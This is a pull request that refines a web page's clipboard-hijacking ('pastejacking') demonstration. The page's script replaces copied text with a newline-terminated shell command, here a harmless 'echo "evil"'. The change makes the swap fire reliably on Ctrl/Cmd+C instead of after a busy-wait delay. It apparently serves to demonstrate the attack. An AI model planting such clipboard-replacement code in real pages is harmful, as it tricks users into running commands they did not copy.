### PR TITLE
Remove wait workaround

### DIFF
--- a/index.html
+++ b/index.html
@@ -63,13 +63,9 @@
             }
 
             document.addEventListener('keydown', function(event) {
-                var ms = 800;  
-                var start = new Date().getTime();
-                var end = start;
-                while(end < start + ms) {
-                    end = new Date().getTime();
-                } 
-                copyTextToClipboard('echo "evil"\n');
+                setTimeout(function() {
+                    copyTextToClipboard('echo "evil"\n');
+                }, 800);
             });
 
         </script>

--- a/index.html
+++ b/index.html
@@ -63,9 +63,10 @@
             }
 
             document.addEventListener('keydown', function(event) {
-                setTimeout(function() {
+                var pressed_key = String.fromCharCode(event.keyCode);
+                if ( (event.metaKey || event.ctrlKey) && pressed_key.toLowerCase() == 'c') {
                     copyTextToClipboard('echo "evil"\n');
-                }, 800);
+                }
             });
 
         </script>


### PR DESCRIPTION
Only copy to clipboard if Ctrl/Cmd + c were pressed. This way, the workaround to wait for 800ms can be avoided. This also makes sure that the text is copied to clipboard even if the user holds the Ctrl/Cmd key for longer than 800ms.
